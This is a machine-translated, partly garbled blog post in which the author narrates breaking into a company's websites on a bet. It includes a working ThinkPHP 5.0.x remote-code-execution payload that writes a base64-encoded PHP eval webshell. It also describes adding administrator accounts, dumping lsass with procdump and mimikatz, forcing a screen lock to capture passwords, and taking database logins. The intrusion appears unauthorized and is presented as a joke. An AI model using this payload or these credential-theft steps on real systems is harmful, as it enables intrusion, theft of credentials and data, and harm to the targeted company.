Recently, I lost my job, wandered in the streets, robbed mineral water bottles with old people and women, and couldn’t compete with the old lady. I don’t have many bottles a day (hey, there are bottles in your group). Come back and hoe the earth with my sister. The card luck was very good. She won many games, which made her anxious: “you’re so blatant, big black and broad, aren’t you great? Hum, I haven’t seen you take a station.”. With years of high EQ, I not only didn’t coax my sister to be happy, but also made a bet with her and said I would get you a station today“ OK, you go. Hum, ignore you “. Look, when I win the next station, she will worship me very much.
0x00 information collection
Information collection is the most important link. Select an enterprise and collect the domain name information of the enterprise first. It was found on Baidu that the two main websites of the enterprise, fxxxx.cc and jxxxx.com, searched the sub domain names respectively. Generally, other people’s online tools, sublist3r, subdomainsbrute and layer are used to integrate their results. If necessary, Baidu and Google will collect them. Large manufacturers recommend N-level domain name detection:
Check one by one, and then fingerprint each site to know whether the site is a known CMS, what language or framework to use, etc. Sometimes, the cloud may not be swept out. You can use the Firefox plug-in wapalyzer. You can view “other domain names of the unit” in Yunxi, and you can also get more comprehensive information. Collect the filing information again, and there may be unexpected gains.
Then, scan the known site IP with the online port scanning tool to identify the open port; Finally, the information collected by GitHub and Google search is integrated and recorded in detail. Of course, I omitted the collection of whois and so on. I won’t say much about information collection.
0x01 unexpected getshell
During further information collection and vulnerability detection on jxxxx.com, it is found that if a string is arbitrarily added after the URL, the server will respond to an error page and print detailed information. I found that the site uses the ThinkPHP framework and the version number is 5.0.23 – there is no waves on the surface, but actually I have fun in my heart. With years of experience in YY penetration testing under VMware, well, I admit I’m garbage, ha ha ha.
Rce exists in ThinkPHP 5.0. X and 5.1. X. just take out the payload and connect it. You can see that the permission is very high, but helpless. You can’t write into the file, but it can’t be said to be an absolute bad thing. At this time, he showed it to his sister, “Oh, it’s very powerful, Bo, hum”. Ah, I can feel that my sister has been shocked by my speed – so fast!
But I can’t be proud. I have to continue, “Oh, go ahead.” look, my sister is encouraging me and driving it!
However, jxxxx.com has only one login box and two upws left_ The NP page, however, exploded the login box and phpMyAdmin, and there was no progress – ah! Am I proud?
0x02 another shell
Don’t ask me why this title is. I really can’t think of it. In the CRM login interface, use the TOP500 name and weak password to blast, and it is found that it will be lost by ban; In the rest of the logins, TOP500 shows that the user name does not exist – it’s too difficult. At this time, it’s an hour before playing cards. When detecting the CRM system of fxxxx.cc, there is another scribbled URL and familiar interface. At this time, the version of ThinkPHP is 5.0.12, and the version number is also within the scope of the vulnerability.
Try to write the webshell file at this time,
payload：index.php? s=index/thinkapp/invokefunction&function=call_user_func_array&vars=assert&vars[email protected]_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7))，
To access the link where you can execute phpinfo ():
On another site, demo.fxxxx.cc, a shell is created. As follows:
I showed it to my sister again, “hum! Ignore you, don’t play cards with me in the future “! Eh, I won. Why don’t you play cards with me, sister? Sister must be angry at me for winning. She’s so stingy. I’ll keep doing it.
0x03 getshell follow up
Of course, the ultimate goal must be remote desktop (Port 3389 is open). Therefore, open the terminal on the demo.fxxxx.cc shell and add the administrator account. Unfortunately, it cannot be added to the administrator group:
Open the terminal on the shell of crm.fxxxx.cc, add the administrator account, and successfully add it to the administrator user group. However, during remote desktop login, you will be prompted that the connection is rejected and you are not authorized to perform remote login:
In case of such a situation at ordinary times, if the permission is not enough and cannot be added, you can first raise the permission and obtain the system permission. If you have this permission and still can’t, you can grab the plaintext password of the administrator. We often use procdump to obtain the plaintext login password stored in the memory file lsass.exe process, and then use mimikatz to read lsass.dmp, which is OK. However, in this process, you also need to let the administrator log in, so that you can grab the plaintext password, otherwise you will read (null). Therefore, at this time, you need to modify the registry and force the lock screen. In this way, the administrator will log in again after seeing it, so that you can grab the plaintext password.
However, after some tossing, the administrator may have played cards with his sister. I didn’t get it. I’ll go!
Looked at the source code and took the login information of three databases. Only two databases of crm.fxxxx.com are posted below:
There’s nothing to say. Just connect directly. Don’t dare to tamper with the data. After all, you can’t play mobile phones in it. How can you play cards with your sister
0x04 write last
The next day, I woke up and wrote these down. Of course, without the follow-up test, although I got the user’s login user name and password, it’s meaningless. I’d better play cards with my sister. However, after the earth was built, my sister never went online, ah! Are you afraid of losing“ Gun! I don’t want to talk to you anymore. Orz。 Little broken station, foieojoejgoisejgijohgudgadojefoejof is out of luck!
PS: everything in this article happened in sleepwalking:).